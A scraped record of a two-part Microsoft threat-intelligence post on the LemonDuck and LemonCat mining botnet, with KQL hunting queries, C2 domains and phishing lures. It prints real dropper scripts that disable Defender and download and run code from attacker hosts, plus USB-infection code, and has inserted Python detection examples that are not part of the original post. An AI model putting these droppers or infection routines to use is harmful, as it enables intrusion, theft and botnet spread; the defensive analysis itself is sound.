[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates its statically named scheduled tasks, or for the semi-unique task creation pattern LemonDuck also uses: a hidden PowerShell process launched by a task with a randomly generated name. An example of a randomly generated one is: \"schtasks.exe\" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr \"powershell -w hidden -c PS_CMD\". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier, and has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper bound in this query can be modified, and the query can be extended with time bounding. 
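The time bounding the paragraph above suggests, as an added Python example that is not part of the Microsoft post. It ports the killer-script query that follows to Python and evaluates each device's distinct `schtasks /Delete` command lines inside a sliding window (10 minutes here, an assumed value) rather than over the whole result set, so a burst of 40-80 deletions from KR.Bin is told apart from the same count accumulated by months of routine task clean-up. Device names, timestamps and task names are constructed for this example; `window=None` reproduces the unbounded `summarize` of the original query for comparison.

```python
# Added example: the competition-killer hunt with a sliding time window.
# Constructed events; not code from the Microsoft post.
import re
from datetime import datetime, timedelta

KILL_MARKERS = ["schtasks.exe", "/Delete", "/TN", "/F"]
KNOWN_VICTIMS = ["Mysa", "Sorry", "Oracle Java Update", "ok"]


def has_term(text, needle):
    # Whole-term, case-insensitive match in the spirit of KQL `has`:
    # "ok" must not fire on "Outlook" and "/F" must not fire on "/Force".
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(needle) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def is_task_delete(cmd):
    return all(has_term(cmd, m) for m in KILL_MARKERS)


def killer_windows(events, low=40, high=80, window=timedelta(minutes=10)):
    """Per device, count distinct schtasks /Delete command lines that fall
    inside one `window` and name a known killer-script target; return
    {DeviceId: count} for devices whose count lands in [low, high].
    window=None evaluates the whole set once, like the KQL summarize."""
    per_device = {}
    for e in sorted(events, key=lambda e: e["Timestamp"]):
        if is_task_delete(e["ProcessCommandLine"]):
            per_device.setdefault(e["DeviceId"], []).append(e)

    alerts = {}
    for device, evs in per_device.items():
        if window is None:
            spans = [(0, len(evs) - 1)]
        else:
            spans, start = [], 0
            for end in range(len(evs)):
                # Advance the window start until the span fits inside `window`.
                while evs[end]["Timestamp"] - evs[start]["Timestamp"] > window:
                    start += 1
                spans.append((start, end))
        for s, t in spans:
            seen = {x["ProcessCommandLine"] for x in evs[s:t + 1]}
            if low <= len(seen) <= high and any(
                    has_term(c, k) for c in seen for k in KNOWN_VICTIMS):
                alerts[device] = max(alerts.get(device, 0), len(seen))
    return alerts


def _deletions(device, first, names, spacing):
    # One constructed schtasks /Delete event per task name, `spacing` apart.
    return [{"DeviceId": device, "Timestamp": first + i * spacing,
             "ProcessCommandLine": f'"schtasks.exe" /Delete /TN "{n}" /F'}
            for i, n in enumerate(names)]


T0 = datetime(2021, 7, 29, 12, 0, 0)
# Killer script: 45 distinct deletions one second apart, naming known targets.
BURST = _deletions("ws01", T0, ["Mysa", "Sorry", "Oracle Java Update"]
                   + [f"task{i}" for i in range(42)], timedelta(seconds=1))
# The same volume from a slow administrative clean-up, one task per day.
SLOW = _deletions("ws02", T0, ["Mysa"] + [f"task{i}" for i in range(44)],
                  timedelta(days=1))
# A handful of deletions with a known name: below the band either way.
FEW = _deletions("ws03", T0, ["ok", "task1", "task2"], timedelta(seconds=1))
SAMPLE_EVENTS = BURST + SLOW + FEW

if __name__ == "__main__":
    print("windowed :", killer_windows(SAMPLE_EVENTS))
    print("unbounded:", killer_windows(SAMPLE_EVENTS, window=None))
```

With the window, only ws01 is reported; without it, ws02's month and a half of one-a-day clean-ups reaches the same count of 45 and is reported too. A burst larger than `high` still surfaces in the windowed form, because the count passes through the band as the window fills.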
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck attempts to retrieve the IP address of a C2 and, in the same script, modify the hosts file with the retrieved address. The address is mapped to a randomly generated host name that does not otherwise exist, and the script then instructs the machine to download data from that address. This query has a more general and a more specific form, allowing the detection of this technique if other activity groups were to utilize it. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still reuses C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized malware, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
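The dropper scripts in the comparison that follows split cmdlet names with backticks and assemble the download URL from concatenated string literals, so a command-line hunt for IEx, New-Object or the C2 host name would miss them as written. As an added Python example that is not part of the Microsoft post, the normaliser below undoes both tricks before keyword matching and shows the difference on a sample. The sample command line is a shortened paraphrase of the March 2021 script constructed for this example, and the keyword list is an assumption about what such a hunt would look for.

```python
# Added example: normalise backtick-split and concatenated PowerShell before
# keyword matching. Constructed sample; not code from the Microsoft post.
import re

# A backtick outside a string literal escapes the next character; before an
# ordinary letter that is a no-op, which is why splitting cmdlet names with it
# costs the attacker nothing. This strips it everywhere, including inside
# double-quoted strings, where "`n" becomes "n": acceptable for keyword
# matching, not for reconstructing the script faithfully.
_BACKTICK = re.compile(r"`(?=[A-Za-z0-9_-])")
# 'abc' + 'def'  ->  'abcdef'   (single-quoted literals only)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize_powershell(cmd):
    """Undo backtick splitting and literal concatenation for matching."""
    out = _BACKTICK.sub("", cmd)
    while True:  # repeat so 'a'+'b'+'c' collapses fully
        merged = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", out)
        if merged == out:
            return out
        out = merged


# Assumed hunt terms, including the Duck domain the March 2021 sample
# assembles from two literals.
KEYWORDS = ["IEx", "New-Object", "Net.WebClient", "DownloadString", "zz3r0.com"]


def keyword_hits(cmd):
    """Case-insensitive substring check of each keyword against `cmd`."""
    low = cmd.lower()
    return [k for k in KEYWORDS if k.lower() in low]


# Constructed, shortened paraphrase of the March 2021 dropper command line.
SAMPLE_CMD = ("powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient)"
              ".DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js')")

if __name__ == "__main__":
    print("raw       :", keyword_hits(SAMPLE_CMD))
    print("normalized:", keyword_hits(normalize_powershell(SAMPLE_CMD)))
```

On the raw command line only DownloadString matches, because the attacker left that one name intact; after normalisation all five terms match, including the reassembled zz3r0[.]com host. The same normalisation belongs in front of the `has_any(\"Lemon_Duck\",\"LemonDuck\")` keyword hunt in Part 2, since a backtick inside that variable name would defeat it just as easily.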
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also keep a running list of drives that are already infected, based on whether the script finds the threat already installed. Once a drive is checked against the running list, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \n// Skip drives already handled in this run \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \n// The marker file records that the drive was already infected \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \n// Unsupported drive type: never retry it \nblacklist.Add(drive.Name); \n} \n}`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", 
